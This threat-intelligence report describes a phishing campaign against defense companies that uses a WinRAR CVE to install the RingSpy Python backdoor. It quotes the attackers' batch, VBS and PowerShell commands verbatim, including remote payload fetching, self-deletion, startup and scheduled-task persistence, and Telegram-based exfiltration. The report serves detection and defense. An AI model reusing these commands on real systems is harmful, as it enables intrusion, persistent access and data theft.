Mysterious Werewolf hits defense industry with new RingSpy backdoor

BI.ZONE
5 min readMar 13, 2024

--

The criminal group gains initial access through phishing emails with a compressed executable that unleashes RingSpy, an original remote access backdoor.

The BI.ZONE Threat Intelligence team has detected a new campaign by Mysterious Werewolf, a cluster that has been active since at least 2023. This time, the adversaries are targeting defense enterprises. To achieve their goals, they use phishing emails with an archive attached. The archive contains a legitimate PDF document and a malicious CMD file. Once the document is extracted and double-clicked, the exploit launches the CMD file to deliver the RingSpy backdoor to the compromised system. This malware has replaced the Athena agent (Mythic C2 framework) utilized by Mysterious Werewolf in its previous attacks.

Key findings

  1. Mysterious Werewolf continues to use phishing emails and CVE-2023–38831 in WinRAR to run malicious code in target systems.
  2. The threat actors are experimenting with malicious payload. Now they have opted for RingSpy, a Python backdoor, to replace the Athena agent (Mythic C2 framework).
  3. As before, the cluster abuses legitimate services to communicate with compromised systems. Thus, the criminals have turned a Telegram bot into their command-and-control server.

Attack description

The victim presumably receives an email with an archive that enables the criminals to exploit CVE-2023–38831. Opening the legitimate file in the archive launches a malicious script (e.g, O_predostavlenii_kopii_licenzii.pdf .cmd) that:

  • creates a.vbs file in the folder C:\Users\[user]\AppData\Local and writes a script to run the file whose name was passed as an argument
  • creates a 1.bat file in the folder C:\Users\[user]\AppData\Local and launches it with a command call "%localappdata%\.vbs" "%localappdata%\1.bat"
  • self-deletes after the launch:
    (goto) 2>nul & del "%~f0"

The running of 1.bat makes it possible to:

  • obtain the download link for the next stage of intrusion and save it in the r file in the folder C:\Users\[user]\AppData\Local:
    curl -o "C:\Users\[redacted]\AppData\Local\r" -L -O -X GET "https://cloud-api.yandex.net/v1/disk/resources/download?path=bat.bat" -H "Accept: application/json" -H "Authorization: OAuth [redacted]" -H "Content-Type: application/json"
  • download the file via the previously obtained link:
    set /p B=<"C:\Users\[redacted]\AppData\Local\r"
    curl -o "C:\Users\[redacted]\AppData\Local\i.bat" -L -O -X GET "%B:~9,445%" -H "Accept: application/json" -H "Authorization: OAuth [redacted]" -H "Content-Type: application/json"
  • delete the file with the download link:
    del /s /q "C:\Users\thesage\AppData\Local\r
  • run the downloaded file with the help of .vbs:
    call C:\Users\[redacted]\AppData\Local\.vbs C:\Users\[redacted]\AppData\Local\i.bat
  • self-delete after the launch:
    (goto) 2>nul & del "%~f0"

The running of the i.bat script makes it possible to:

  • prevent the repeat installation by checking the presence of the file C:\Users\[redacted]\AppData\Local\Microsoft\Windows\Caches\cversions.db; if missing, the file is created and its execution continues:
    if exist "%localappdata%\Microsoft\Windows\Caches\cversions.db" (
    exit 0
    )
    echo. > "%localappdata%\Microsoft\Windows\Caches\cversions.db"
  • obtain the download address; download, open, and delete the decoy document (see the screenshot below) as well as delete the file with the download link:
    curl -s -o "%PDF_FOLDER%\r" -L -O -X GET "https://cloud-api.yandex.net/v1/disk/resources/download?path=file.pdf" -H "Accept: application/json" -H "Authorization: OAuth [redacted] " -H "Content-Type: application/json"
    set /p B=<"%PDF_FOLDER%\r"
    curl -s -o "%PDF_FOLDER%\O predostavlenii licens.pdf" -L -O -X GET "%B:~9,443%" -H "Accept: application/json" -H "Authorization: OAuth [redacted] " -H "Content-Type: application/json"
    start "" "%PDF_FOLDER%\O predostavlenii licens.pdf"
    del /s /q "%PDF_FOLDER%\r"
Decoy document
  • download the Python interpreter from the official website and unpack it to the folder C:\Users\[redacted]\AppData\Local\Python, and finally delete the archive:
    curl -s -o %localappdata%\python.zip -L -O "https://www.python.org/ftp/python/%PYTHON_VERSION_FIRST_TWO_PARTS%.4/python-%PYTHON_VERSION_FIRST_TWO_PARTS%.4-embed-amd64.zip"
    if exist "%FOLDER%" (
    rmdir /s /q "%FOLDER%"
    mkdir "%FOLDER%"
    ) else (
    mkdir "%FOLDER%"
    )
    tar -xf %localappdata%\python.zip -C "%FOLDER%"
    del /s /q %localappdata%\python.zip.
    The variables used are:
    FOLDER=%localappdata%\Python
    PYTHON_VERSION_FIRST_TWO_PARTS=3.11
    PYTHON_VERSION_FIRST_TWO_PARTS_WITHOUT_POINT=311
  • assign an attribute to the hidden folder C:\Users\[redacted]\AppData\Local\Python:
    attrib +h "%FOLDER%" /s /d
  • create the file C:\Users\[redacted]\AppData\Local\python311._pth with the following content:
    Lib/site-packages
    python.zip
    .
    # Uncomment to run site.main() automatically
    import site
  • obtain and launch the pip installer to download additional packets:
    (cd "%FOLDER%" && curl -s -o get-pip.py https://bootstrap.pypa.io/get-pip.py && python get-pip.py)
    call python -m pip install requests
    call python -m pip install schedule
    del /s /q get-pip.py
  • save the configuration for connecting RingSpy with a Telegram bot in the file C:\Users\[redacted]\AppData\Local\microsoft\windows\cloudstore\cloud
  • download RingSpy’s Python script via the Yandex Cloud API:
    curl -s -o "%FOLDER%\r" -L -O -X GET "https://cloud-api.yandex.net/v1/disk/resources/download?path=f" -H "Accept: application/json" -H "Authorization: OAuth [redacted] " -H "Content-Type: application/json"
    set /p B=<"%FOLDER%\r"

    echo "%B:~9,426%"
    curl -s -o "%FOLDER%\f.py" -L -O -X GET "%B:~9,426%" -H "Accept: application/json" -H "Authorization: OAuth [redacted] " -H "Content-Type: application/json"
    del /s /q "%FOLDER%\r"
    Where the .vbs file exists in the folder C:\Users\[user]\AppData\Local, it is deleted.
  • create the python.vbs file in the folder C:\Users\[redacted]\AppData\Local\Python with the following content:
    Set oShell = CreateObject("Wscript.Shell")
    oShell.Run “C:\Users\[redacted]\AppData\Local\Python\python.exe” "C:\Users\[redacted]\AppData\Local\Python\f.py” , 0, true
  • copy the created file to the startup folder:
    copy "%localappdata%\Python\python.vbs" "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup"
  • execute the created file:
    call "%localappdata%\Python\python.vbs"
  • run the downloaded backdoor file and self-delete, even if the.vbs file is missing:
    (goto) 2>nul & start /b python "%FOLDER%\f.py" -f "d" & del "%~f0"

The RingSpy backdoor enables an adversary to remotely execute commands, obtain their results, and download files from network resources. With the -f launch option enabled, RingSpy creates a scheduled task to run the python.vbs script every minute:

powershell.exe schtasks /create /tn 'GoogleUpdatess' /tr '{local}\\Python\\python.vbs' /sc minute /mo 1

The backdoor’s C2 server is a Telegram bot. When the commands are successfully executed, their output is recorded into the file C:\Users\[redacted]\AppData\Local\Python\rs.txt to be sent as a file to the C2 server.

Downloading the file from the specified network location requires the following PowerShell command:

powershell.exe Invoke-WebRequest -Uri "http://[network resource]/[file name]" -OutFile " C:\Users\[redacted]\AppData\Local\Microsoft\Windows\Ringtones\[file name]"

The files are sent to the C2 sever via https://api.telegram.org/bot[bot token]/sendDocument while the text is transferred through https://api.telegram.org/bot[bot token]/sendMessage.

Indicators of compromise

5183844b5e67e204efa4b44e12fa8f4e
76b0c05bf735fc5e792041842c4b486a9bf750d1
9eb3d53f505fd8b6ddd9457bf829f549c922c9f77325dd9ad82e6d99589be1fa

MITRE ATT&CK

More indicators of compromise and a detailed description of threat actor tactics, techniques, and procedures are available on the BI.ZONE Threat Intelligence platform.

Conclusions

The Mysterious Werewolf cluster continues to develop its attack methods. This time, the threat actors focus on the critical infrastructure of the defense industry. To communicate with the compromised systems, they resort to legitimate services more frequently than before. This once again proves the need for effective endpoint protection and round-the-clock monitoring, for example, as part of the BI.ZONE TDR service. Meanwhile, with real-time insights from the BI.ZONE Threat Intelligence platform, you can stay updated on the new methods employed at early attack stages and improve the effectiveness of your security solutions.

--

--

BI.ZONE
BI.ZONE

Written by BI.ZONE

BI.ZONE: an expert in digital risks management. We help organizations around the world to develop their businesses safely in the digital age

No responses yet